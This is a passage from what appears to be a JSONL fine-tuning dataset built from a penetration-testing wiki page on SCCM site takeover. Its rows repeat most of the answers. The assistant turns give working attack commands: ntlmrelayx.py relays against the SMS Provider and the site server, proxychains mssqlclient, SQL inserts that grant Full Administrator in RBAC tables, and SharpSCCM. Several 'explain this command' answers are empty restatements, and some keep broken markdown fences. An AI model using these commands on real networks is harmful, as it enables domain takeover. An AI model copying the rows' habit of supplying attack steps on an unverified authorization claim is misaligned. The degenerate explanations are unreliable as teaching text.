steps."}, {"role": "user", "content": "Give me the proxychains command to sccm site takeover - step 4: obtain an sql console"}, {"role": "assistant", "content": "proxychains mssqlclient.py \"DOMAIN/SCCM-Server$\"@\"siteDatabase.domain.local\" -windows-auth"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the proxychains command to sccm site takeover - step 4: obtain an sql console", "response": "proxychains mssqlclient.py \"DOMAIN/SCCM-Server$\"@\"siteDatabase.domain.local\" -windows-auth", "metadata": {"corpus_index": 1093, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "proxychains"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for SCCM site takeover - Step 4: Obtain an SQL console"}, {"role": "assistant", "content": "proxychains mssqlclient.py \"DOMAIN/SCCM-Server$\"@\"siteDatabase.domain.local\" -windows-auth"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for SCCM site takeover - Step 4: Obtain an SQL console", "response": "proxychains mssqlclient.py \"DOMAIN/SCCM-Server$\"@\"siteDatabase.domain.local\" -windows-auth", "metadata": {"corpus_index": 1093, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `proxychains mssqlclient.py \"DOMAIN/SCCM-Server$\"@\"siteDatabase.domain.local\" -windows-auth`?"}, {"role": "assistant", "content": "This command is used for sccm site takeover - step 4: obtain an sql console. Step 4: Obtain an SQL console"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `proxychains mssqlclient.py \"DOMAIN/SCCM-Server$\"@\"siteDatabase.domain.local\" -windows-auth`?", "response": "This command is used for sccm site takeover - step 4: obtain an sql console. Step 4: Obtain an SQL console", "metadata": {"corpus_index": 1093, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for SCCM site takeover - Step 4: Obtain an SQL console?"}, {"role": "assistant", "content": "--Switch to site database\nuse CM_\n\n--Add the SID, the name of the current user, and the site code to the RBAC_Admins table\nINSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (,'DOMAIN\\user',0,0,'','','','','');\n\n--Retrieve the AdminID of the added user\nSELECT AdminID,LogonName FROM RBAC_Admins;\n\n--Add records to the RBAC_ExtendedPermissions table granting the AdminID the Full Administrator (SMS0001R) RoleID for the \"All Objects\" scope (SMS00ALL), \n--the \"All Systems\" scope (SMS00001), \n--and the \"All Users and User Groups\" scope (SMS00004)\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00ALL','29');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00001','1');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00004','1');"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for SCCM site takeover - Step 4: Obtain an SQL console?", "response": "--Switch to site database\nuse CM_\n\n--Add the SID, the name of the current user, and the site code to the RBAC_Admins table\nINSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (,'DOMAIN\\user',0,0,'','','','','');\n\n--Retrieve the AdminID of the added user\nSELECT AdminID,LogonName FROM RBAC_Admins;\n\n--Add records to the RBAC_ExtendedPermissions table granting the AdminID the Full Administrator (SMS0001R) RoleID for the \"All Objects\" scope (SMS00ALL), \n--the \"All Systems\" scope (SMS00001), \n--and the \"All Users and User Groups\" scope (SMS00004)\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00ALL','29');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00001','1');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00004','1');", "metadata": {"corpus_index": 1094, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `--Switch to site database`?"}, {"role": "assistant", "content": "This command is used for sccm site takeover - step 4: obtain an sql console. Step 4: Obtain an SQL console"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `--Switch to site database`?", "response": "This command is used for sccm site takeover - step 4: obtain an sql console. Step 4: Obtain an SQL console", "metadata": {"corpus_index": 1094, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about this should be run on the windows SCCM client as the user that was just given full administrative role to"}, {"role": "assistant", "content": ".\\SharpSCCM.exe get site-push-settings -mp \"SCCM-Server\" -sc \"\"\n```\n\nPost exploitation via SCCM can now be performed on the network."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about this should be run on the windows SCCM client as the user that was just given full administrative role to", "response": ".\\SharpSCCM.exe get site-push-settings -mp \"SCCM-Server\" -sc \"\"\n```\n\nPost exploitation via SCCM can now be performed on the network.", "metadata": {"corpus_index": 1095, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for this should be run on the windows SCCM client as the user that was just given full administrative role to"}, {"role": "assistant", "content": ".\\SharpSCCM.exe get site-push-settings -mp \"SCCM-Server\" -sc \"\"\n```\n\nPost exploitation via SCCM can now be performed on the network."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for this should be run on the windows SCCM client as the user that was just given full administrative role to", "response": ".\\SharpSCCM.exe get site-push-settings -mp \"SCCM-Server\" -sc \"\"\n```\n\nPost exploitation via SCCM can now be performed on the network.", "metadata": {"corpus_index": 1095, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about SCCM site takeover - Relay to the HTTP API AdminService?"}, {"role": "assistant", "content": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * The HTTP API for the AdminService service is reachable on the SMS Provider server\n> * knowing the NetBIOS name, FQDN, or IP address of a site management point is required\n> * knowing the NetBIOS name, FQDN, or IP address of the site SMS provider server is required"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about SCCM site takeover - Relay to the HTTP API AdminService?", "response": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * The HTTP API for the AdminService service is reachable on the SMS Provider server\n> * knowing the NetBIOS name, FQDN, or IP address of a site management point is required\n> * knowing the NetBIOS name, FQDN, or IP address of the site SMS provider server is required", "metadata": {"corpus_index": 1096, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for SCCM site takeover - Relay to the HTTP API AdminService"}, {"role": "assistant", "content": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * The HTTP API for the AdminService service is reachable on the SMS Provider server\n> * knowing the NetBIOS name, FQDN, or IP address of a site management point is required\n> * knowing the NetBIOS name, FQDN, or IP address of the site SMS provider server is required"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for SCCM site takeover - Relay to the HTTP API AdminService", "response": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * The HTTP API for the AdminService service is reachable on the SMS Provider server\n> * knowing the NetBIOS name, FQDN, or IP address of a site management point is required\n> * knowing the NetBIOS name, FQDN, or IP address of the site SMS provider server is required", "metadata": {"corpus_index": 1096, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe SCCM site takeover - Step 1: setup an NTLM relay server in the context of penetration testing"}, {"role": "assistant", "content": "The target of the NTLM relay attack must be set to the SMS Provider server, on the HTTP/S service (port 80/tcp or 443/tcp).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this PR on Impacket's ntlmrelayx.py (Python) script can be used for that purpose.\n\n``bash\nntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname \"DOMAIN\\USER\" --displayname \"DOMAIN\\USER\" --objectsid $OBJECTSID\n``\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same functionalities regarding this specific target, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe SCCM site takeover - Step 1: setup an NTLM relay server in the context of penetration testing", "response": "The target of the NTLM relay attack must be set to the SMS Provider server, on the HTTP/S service (port 80/tcp or 443/tcp).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this PR on Impacket's ntlmrelayx.py (Python) script can be used for that purpose.\n\n``bash\nntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname \"DOMAIN\\USER\" --displayname \"DOMAIN\\USER\" --objectsid $OBJECTSID\n``\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same functionalities regarding this specific target, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay.", "metadata": {"corpus_index": 1097, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SCCM site takeover - Step 1: setup an NTLM relay server"}, {"role": "assistant", "content": "The target of the NTLM relay attack must be set to the SMS Provider server, on the HTTP/S service (port 80/tcp or 443/tcp).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this PR on Impacket's ntlmrelayx.py (Python) script can be used for that purpose.\n\n``bash\nntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname \"DOMAIN\\USER\" --displayname \"DOMAIN\\USER\" --objectsid $OBJECTSID\n``\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same functionalities regarding this specific target, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SCCM site takeover - Step 1: setup an NTLM relay server", "response": "The target of the NTLM relay attack must be set to the SMS Provider server, on the HTTP/S service (port 80/tcp or 443/tcp).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this PR on Impacket's ntlmrelayx.py (Python) script can be used for that purpose.\n\n``bash\nntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname \"DOMAIN\\USER\" --displayname \"DOMAIN\\USER\" --objectsid $OBJECTSID\n``\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same functionalities regarding this specific target, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay.", "metadata": {"corpus_index": 1097, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the ntlmrelayx.py command to sccm site takeover - step 1: setup an ntlm relay server"}, {"role": "assistant", "content": "ntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname \"DOMAIN\\USER\" --displayname \"DOMAIN\\USER\" --objectsid $OBJECTSID"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the ntlmrelayx.py command to sccm site takeover - step 1: setup an ntlm relay server", "response": "ntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname \"DOMAIN\\USER\" --displayname \"DOMAIN\\USER\" --objectsid $OBJECTSID", "metadata": {"corpus_index": 1098, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntlmrelayx.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute SCCM site takeover - Step 1: setup an NTLM relay server?"}, {"role": "assistant", "content": "ntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname \"DOMAIN\\USER\" --displayname \"DOMAIN\\USER\" --objectsid $OBJECTSID"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute SCCM site takeover - Step 1: setup an NTLM relay server?", "response": "ntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname \"DOMAIN\\USER\" --displayname \"DOMAIN\\USER\" --objectsid $OBJECTSID", "metadata": {"corpus_index": 1098, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname \"DOMAIN\\USER\" --displayname \"DOMAIN\\USER\" --objectsid $OBJECTSID`?"}, {"role": "assistant", "content": "This command is used for sccm site takeover - step 1: setup an ntlm relay server. Step 1: setup an NTLM relay server"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname \"DOMAIN\\USER\" --displayname \"DOMAIN\\USER\" --objectsid $OBJECTSID`?", "response": "This command is used for sccm site takeover - step 1: setup an ntlm relay server. Step 1: setup an NTLM relay server", "metadata": {"corpus_index": 1098, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain this should be run on the windows SCCM client as the user that was just given full administrative role to"}, {"role": "assistant", "content": "SharpSCCM.exe get site-push-settings -mp \"SCCM-Server\" -sc \"$SITE_CODE\"\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain this should be run on the windows SCCM client as the user that was just given full administrative role to", "response": "SharpSCCM.exe get site-push-settings -mp \"SCCM-Server\" -sc \"$SITE_CODE\"\n```", "metadata": {"corpus_index": 1099, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do this should be run on the windows SCCM client as the user that was just given full administrative role to"}, {"role": "assistant", "content": "SharpSCCM.exe get site-push-settings -mp \"SCCM-Server\" -sc \"$SITE_CODE\"\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do this should be run on the windows SCCM client as the user that was just given full administrative role to", "response": "SharpSCCM.exe get site-push-settings -mp \"SCCM-Server\" -sc \"$SITE_CODE\"\n```", "metadata": {"corpus_index": 1099, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about SCCM site takeover - Relay from a passive site server to the active site server?"}, {"role": "assistant", "content": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * a passive site server is present on the network and it's reachable\n> * knowing the NetBIOS name, FQDN, or IP address of the passive and active site servers is required\n> * SMB signing is not required on the active site server (default)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about SCCM site takeover - Relay from a passive site server to the active site server?", "response": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * a passive site server is present on the network and it's reachable\n> * knowing the NetBIOS name, FQDN, or IP address of the passive and active site servers is required\n> * SMB signing is not required on the active site server (default)", "metadata": {"corpus_index": 1100, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SCCM site takeover - Relay from a passive site server to the active site server"}, {"role": "assistant", "content": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * a passive site server is present on the network and it's reachable\n> * knowing the NetBIOS name, FQDN, or IP address of the passive and active site servers is required\n> * SMB signing is not required on the active site server (default)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SCCM site takeover - Relay from a passive site server to the active site server", "response": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * a passive site server is present on the network and it's reachable\n> * knowing the NetBIOS name, FQDN, or IP address of the passive and active site servers is required\n> * SMB signing is not required on the active site server (default)", "metadata": {"corpus_index": 1100, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain SCCM site takeover - Step 1: setup an NTLM relay server"}, {"role": "assistant", "content": "The target of the NTLM relay attack must be set to the active site server, on the SMB service.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ntlmrelayx.py (Python) script can be used for that purpose.\n\n``bash\nntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks\n``\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same functionalities regarding this specific target, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain SCCM site takeover - Step 1: setup an NTLM relay server", "response": "The target of the NTLM relay attack must be set to the active site server, on the SMB service.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ntlmrelayx.py (Python) script can be used for that purpose.\n\n``bash\nntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks\n``\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same functionalities regarding this specific target, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay.", "metadata": {"corpus_index": 1101, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SCCM site takeover - Step 1: setup an NTLM relay server"}, {"role": "assistant", "content": "The target of the NTLM relay attack must be set to the active site server, on the SMB service.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ntlmrelayx.py (Python) script can be used for that purpose.\n\n``bash\nntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks\n``\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same functionalities regarding this specific target, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SCCM site takeover - Step 1: setup an NTLM relay server", "response": "The target of the NTLM relay attack must be set to the active site server, on the SMB service.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ntlmrelayx.py (Python) script can be used for that purpose.\n\n``bash\nntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks\n``\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same functionalities regarding this specific target, need in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay.", "metadata": {"corpus_index": 1101, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ntlmrelayx.py syntax for sccm site takeover - step 1: setup an ntlm relay server?"}, {"role": "assistant", "content": "ntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ntlmrelayx.py syntax for sccm site takeover - step 1: setup an ntlm relay server?", "response": "ntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks", "metadata": {"corpus_index": 1102, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntlmrelayx.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute SCCM site takeover - Step 1: setup an NTLM relay server?"}, {"role": "assistant", "content": "ntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute SCCM site takeover - Step 1: setup an NTLM relay server?", "response": "ntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks", "metadata": {"corpus_index": 1102, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: 